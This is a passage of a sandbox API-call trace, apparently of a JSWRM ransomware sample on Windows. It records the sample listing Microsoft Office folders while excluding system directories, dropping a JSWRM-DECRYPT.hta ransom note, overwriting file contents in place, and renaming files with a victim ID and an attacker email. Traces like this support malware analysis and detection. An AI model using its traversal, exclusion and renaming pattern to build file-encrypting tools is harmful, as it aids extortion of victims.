lpUsedDefaultChar=0x0) returned 23 [0112.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvSubsystems32.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0112.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0112.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvSubsystems32.dll", cchWideChar=23, lpMultiByteStr=0x241178, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIsvSubsystems32.dll", lpUsedDefaultChar=0x0) returned 23 [0112.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0112.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0112.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0112.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0112.250] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6cc6b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6cc6b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6cc6b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14aa8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppVIsvSubsystems64.dll", cAlternateFileName="APPVIS~1.DLL")) returned 1 [0112.250] lstrcmpiW (lpString1="AppVIsvSubsystems64.dll", lpString2=".") returned 1 [0112.250] lstrcmpiW (lpString1="AppVIsvSubsystems64.dll", lpString2="..") returned 1 [0112.250] lstrcmpiW (lpString1="AppVIsvSubsystems64.dll", lpString2="...") returned 1 [0112.250] lstrcmpiW (lpString1="AppVIsvSubsystems64.dll", lpString2="windows") returned -1 [0112.250] lstrcmpiW (lpString1="AppVIsvSubsystems64.dll", lpString2="recovery") returned -1 [0112.250] lstrcmpiW (lpString1="AppVIsvSubsystems64.dll", lpString2="perflogs") returned -1 [0112.250] lstrcmpiW (lpString1="AppVIsvSubsystems64.dll", lpString2="documents and settings") returned -1 [0112.250] lstrcmpiW (lpString1="AppVIsvSubsystems64.dll", lpString2="$RECYCLE.BIN") returned 1 [0112.250] lstrcmpiW (lpString1="AppVIsvSubsystems64.dll", lpString2="system volume information") returned -1 [0112.250] lstrcmpiW (lpString1="AppVIsvSubsystems64.dll", lpString2="msocache") returned -1 [0112.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvSubsystems64.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0112.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0112.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvSubsystems64.dll", cchWideChar=23, lpMultiByteStr=0x240ef8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIsvSubsystems64.dll", lpUsedDefaultChar=0x0) returned 23 [0112.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvSubsystems64.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0112.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0112.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvSubsystems64.dll", cchWideChar=23, lpMultiByteStr=0x240fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIsvSubsystems64.dll", lpUsedDefaultChar=0x0) returned 23 [0112.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0112.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0112.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0112.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0112.250] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92201bc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b8c7ea5, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b8c7ea5, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="en-us", cAlternateFileName="")) returned 1 [0112.250] lstrcmpiW (lpString1="en-us", lpString2=".") returned 1 [0112.250] lstrcmpiW (lpString1="en-us", lpString2="..") returned 1 [0112.251] lstrcmpiW (lpString1="en-us", lpString2="...") returned 1 [0112.251] lstrcmpiW (lpString1="en-us", lpString2="windows") returned -1 [0112.251] lstrcmpiW (lpString1="en-us", lpString2="recovery") returned -1 [0112.251] lstrcmpiW (lpString1="en-us", lpString2="perflogs") returned -1 [0112.251] lstrcmpiW (lpString1="en-us", lpString2="documents and settings") returned 1 [0112.251] lstrcmpiW (lpString1="en-us", lpString2="$RECYCLE.BIN") returned 1 [0112.251] lstrcmpiW (lpString1="en-us", lpString2="system volume information") returned -1 [0112.251] lstrcmpiW (lpString1="en-us", lpString2="msocache") returned -1 [0112.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0112.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0112.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0112.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0112.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b448 [0112.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0112.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\jswrm-decrypt.hta")) returned 0xffffffff [0112.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0112.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0112.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0112.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0112.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24c1d0 [0112.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0112.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0112.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b6a0 [0112.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0112.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.256] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.257] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0112.257] CloseHandle (hObject=0x45c) returned 1 [0112.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0112.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0112.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0112.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0112.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0112.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0112.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b6a0 [0112.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0112.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\jswrm-decrypt.hta")) returned 0x20 [0112.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0112.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0112.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0112.258] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92201bc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b8c7ea5, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x399204d5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0112.258] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0112.258] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92201bc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b8c7ea5, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x399204d5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="..", cAlternateFileName="")) returned 1 [0112.260] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0112.260] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0112.260] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x981606a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x981606a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9862502, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2446a, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="accessmui.msi.16_accessmui.mcxml", cAlternateFileName="ACCESS~2.MCX")) returned 1 [0112.260] lstrcmpiW (lpString1="accessmui.msi.16_accessmui.mcxml", lpString2=".") returned 1 [0112.260] lstrcmpiW (lpString1="accessmui.msi.16_accessmui.mcxml", lpString2="..") returned 1 [0112.260] lstrcmpiW (lpString1="accessmui.msi.16_accessmui.mcxml", lpString2="...") returned 1 [0112.260] lstrcmpiW (lpString1="accessmui.msi.16_accessmui.mcxml", lpString2="windows") returned -1 [0112.260] lstrcmpiW (lpString1="accessmui.msi.16_accessmui.mcxml", lpString2="recovery") returned -1 [0112.260] lstrcmpiW (lpString1="accessmui.msi.16_accessmui.mcxml", lpString2="perflogs") returned -1 [0112.260] lstrcmpiW (lpString1="accessmui.msi.16_accessmui.mcxml", lpString2="documents and settings") returned -1 [0112.260] lstrcmpiW (lpString1="accessmui.msi.16_accessmui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.260] lstrcmpiW (lpString1="accessmui.msi.16_accessmui.mcxml", lpString2="system volume information") returned -1 [0112.260] lstrcmpiW (lpString1="accessmui.msi.16_accessmui.mcxml", lpString2="msocache") returned -1 [0112.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0112.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessmui.msi.16_accessmui.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessmui.msi.16_accessmui.mcxml", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessmui.msi.16_accessmui.mcxml", lpUsedDefaultChar=0x0) returned 32 [0112.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0112.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0112.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessmui.msi.16_accessmui.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessmui.msi.16_accessmui.mcxml", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessmui.msi.16_accessmui.mcxml", lpUsedDefaultChar=0x0) returned 32 [0112.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0112.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0112.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0112.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0112.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\accessmui.msi.16_accessmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\accessmui.msi.16_accessmui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.261] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=148586) returned 1 [0112.261] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x24460) returned 0x24c1d0 [0112.261] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x24460, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x24460, lpOverlapped=0x0) returned 1 [0112.273] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.273] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x24460, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x24460, lpOverlapped=0x0) returned 1 [0112.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.274] CloseHandle (hObject=0x238) returned 1 [0112.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0112.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0112.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0112.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0112.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0112.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0112.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0112.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0112.274] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\accessmui.msi.16_accessmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\accessmui.msi.16_accessmui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\accessmui.msi.16_accessmui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\accessmui.msi.16_accessmui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0112.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0112.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0112.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.276] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x97efe5f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x97efe5f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x983c2c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f58, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="accessmuiset.msi.16_accessmuiset.mcxml", cAlternateFileName="ACCESS~1.MCX")) returned 1 [0112.276] lstrcmpiW (lpString1="accessmuiset.msi.16_accessmuiset.mcxml", lpString2=".") returned 1 [0112.276] lstrcmpiW (lpString1="accessmuiset.msi.16_accessmuiset.mcxml", lpString2="..") returned 1 [0112.276] lstrcmpiW (lpString1="accessmuiset.msi.16_accessmuiset.mcxml", lpString2="...") returned 1 [0112.276] lstrcmpiW (lpString1="accessmuiset.msi.16_accessmuiset.mcxml", lpString2="windows") returned -1 [0112.276] lstrcmpiW (lpString1="accessmuiset.msi.16_accessmuiset.mcxml", lpString2="recovery") returned -1 [0112.276] lstrcmpiW (lpString1="accessmuiset.msi.16_accessmuiset.mcxml", lpString2="perflogs") returned -1 [0112.276] lstrcmpiW (lpString1="accessmuiset.msi.16_accessmuiset.mcxml", lpString2="documents and settings") returned -1 [0112.276] lstrcmpiW (lpString1="accessmuiset.msi.16_accessmuiset.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.276] lstrcmpiW (lpString1="accessmuiset.msi.16_accessmuiset.mcxml", lpString2="system volume information") returned -1 [0112.276] lstrcmpiW (lpString1="accessmuiset.msi.16_accessmuiset.mcxml", lpString2="msocache") returned -1 [0112.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0112.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessmuiset.msi.16_accessmuiset.mcxml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0112.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessmuiset.msi.16_accessmuiset.mcxml", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessmuiset.msi.16_accessmuiset.mcxml", lpUsedDefaultChar=0x0) returned 38 [0112.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0112.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0112.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessmuiset.msi.16_accessmuiset.mcxml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0112.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0112.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessmuiset.msi.16_accessmuiset.mcxml", cchWideChar=38, lpMultiByteStr=0x22d298, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessmuiset.msi.16_accessmuiset.mcxml", lpUsedDefaultChar=0x0) returned 38 [0112.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0112.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0112.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0112.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0112.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\accessmuiset.msi.16_accessmuiset.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\accessmuiset.msi.16_accessmuiset.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 